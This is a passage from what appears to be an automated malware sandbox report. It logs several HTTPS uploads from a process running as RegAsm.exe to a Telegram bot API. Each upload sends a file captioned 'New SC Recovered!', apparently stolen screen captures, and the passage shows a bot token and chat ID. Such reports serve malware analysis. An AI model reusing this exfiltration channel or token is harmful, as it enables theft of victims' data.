                                                2024-05-24 05:43:42 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:42 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:42 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:42 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:42 UTC1165OUTData Raw: a8 ac 1a 2a 65 15 25 66 44 e0 a6 ac cf 4c d3 75 3b bb 96 da f7 9b 60 41 97 90 ed 07 1e 9b ba fe b5 95 e2 af 13 c1 25 ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 72 3c 1a 9d 55 52 a3 bd b6 46 d4 a6 e9 53 70 5d 7a 85 14 51 5d c4 05 6b e9 1a a2 c0 9f 67 9c e1 3f 85 bd 3d a9 90 f8 73 57 9e 14 9a 3b 4d d1 c8 a1 94 f9 88 32 0f 23 bd 3f fe 11 7d 6b fe 7c bf f2 2a 7f 8d 29 53 72 56 68 ce 7c 92 56 6c eb f4 cd 52 f2 66 48 62 bb 1e 5f f7 f0 a4 aa fb 31 e4 54 7e 22 f1 45 b5 a5 a3 db 59 4c 26 b9 60 57 72 9c 84 f7 cf 73 5c a7 fc 22 fa d7 fc f9 7f e4 54 ff 00 1a 3f e1 17 d6 bf e7 cb ff 00 22 a7 f8 d7 1c f0 0e ac d4 aa 36 d2 e8 6b 42 aa a3 17 14 f5 7d 4c 7a 2b 48 68 3a a3 00 45 af 07 9f be bf e3 59 f2 c6 f1 4a f1 48 30 e8 4a b0 f4 22 bb 5a 68 49 a6 36 8a 28 a0 61 45
                                                Data Ascii: *e%fDLu;`A%XH$2I"zEr<URFSp]zQ]kg?=sW;M2#?}k|*)SrVh|VlRfHb_1T~"EYL&`Wrs\"T?"6kB}Lz+Hh:EYJH0J"ZhI6(aE
                                                2024-05-24 05:43:42 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 63 65 39 63 36 36 62 32 63 30 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9ece9c66b2c0--
                                                2024-05-24 05:43:42 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:43:43 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:42 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.749714149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:43:57 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dca51c7ada008a
                                                Host: api.telegram.org
                                                Content-Length: 66754
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:43:57 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:43:57 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 31 63 37 61 64 61 30 30 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 31 63 37 61 64 61 30 30 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 31 35 2f 32 30 32 34 20 32 32 3a 30 31 3a 33 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dca51c7ada008aContent-Disposition: form-data; name="chat_id"6553028274-----------------------------8dca51c7ada008aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 07/15/2024 22:01:30User
                                                2024-05-24 05:43:57 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:57 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:57 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:57 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:57 UTC1168OUTData Raw: bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b db 64 6d 4a 6e 95 37 05 d7 a8 51 45 15 dc 40 56 be 91 aa 2c 09 f6 79 ce 13 f8 5b d3 da 99 0f 87 35 79 e1 49 a3 b4 dd 1c 8a 19 4f 98 83 20 f2 3b d3 ff 00 e1 17 d6 bf e7 cb ff 00 22 a7 f8 d2 95 37 25 66 8c e7 c9 25 66 ce bf 4c d5 2f 26 64 86 2b b1 e5 ff 00 7f 0a 4a af b3 1e 45 47 e2 2f 14 5b 5a 5a 3d b5 94 c2 6b 96 05 77 29 c8 4f 7c f7 35 ca 7f c2 2f ad 7f cf 97 fe 45 4f f1 a3 fe 11 7d 6b fe 7c bf f2 2a 7f 8d 71 cf 00 ea cd 4a a3 6d 2e 86 b4 2a aa 31 71 4f 57 d4 c7 a2 b4 86 83 aa 30 04 5a f0 79 fb eb fe 35 9f 2c 6f 14 af 14 83 0e 84 ab 0f 42 2b b5 a6 84 9a 63 68 a2
                                                Data Ascii: +zQRVdNj7SmyyqY^*<ZC /@=qW#U*;dmJn7QE@V,y[5yIO ;"7%f%fL/&d+JEG/[ZZ=kw)O|5/EO}k|*qJm.*1qOW0Zy5,oB+ch
                                                2024-05-24 05:43:57 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 35 31 63 37 61 64 61 30 30 38 61 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dca51c7ada008a--
                                                2024-05-24 05:43:58 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:58 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.749715149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:43:59 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dca773f71df223
                                                Host: api.telegram.org
                                                Content-Length: 66754
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:43:59 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 37 37 33 66 37 31 64 66 32 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 37 37 33 66 37 31 64 66 32 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 31 38 2f 32 30 32 34 20 32 31 3a 34 32 3a 34 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dca773f71df223Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dca773f71df223Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/18/2024 21:42:45User
                                                2024-05-24 05:43:59 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:59 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:59 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:59 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:59 UTC1168OUTData Raw: bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b db 64 6d 4a 6e 95 37 05 d7 a8 51 45 15 dc 40 56 be 91 aa 2c 09 f6 79 ce 13 f8 5b d3 da 99 0f 87 35 79 e1 49 a3 b4 dd 1c 8a 19 4f 98 83 20 f2 3b d3 ff 00 e1 17 d6 bf e7 cb ff 00 22 a7 f8 d2 95 37 25 66 8c e7 c9 25 66 ce bf 4c d5 2f 26 64 86 2b b1 e5 ff 00 7f 0a 4a af b3 1e 45 47 e2 2f 14 5b 5a 5a 3d b5 94 c2 6b 96 05 77 29 c8 4f 7c f7 35 ca 7f c2 2f ad 7f cf 97 fe 45 4f f1 a3 fe 11 7d 6b fe 7c bf f2 2a 7f 8d 71 cf 00 ea cd 4a a3 6d 2e 86 b4 2a aa 31 71 4f 57 d4 c7 a2 b4 86 83 aa 30 04 5a f0 79 fb eb fe 35 9f 2c 6f 14 af 14 83 0e 84 ab 0f 42 2b b5 a6 84 9a 63 68 a2
                                                Data Ascii: +zQRVdNj7SmyyqY^*<ZC /@=qW#U*;dmJn7QE@V,y[5yIO ;"7%f%fL/&d+JEG/[ZZ=kw)O|5/EO}k|*qJm.*1qOW0Zy5,oB+ch
                                                2024-05-24 05:43:59 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 37 37 33 66 37 31 64 66 32 32 33 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dca773f71df223--
                                                2024-05-24 05:44:00 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:44:00 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:00 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.749716149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:44:06 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcaba1a50f6e18
                                                Host: api.telegram.org
                                                Content-Length: 66754
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:06 UTC25INHTTP/1.1 100 Continue
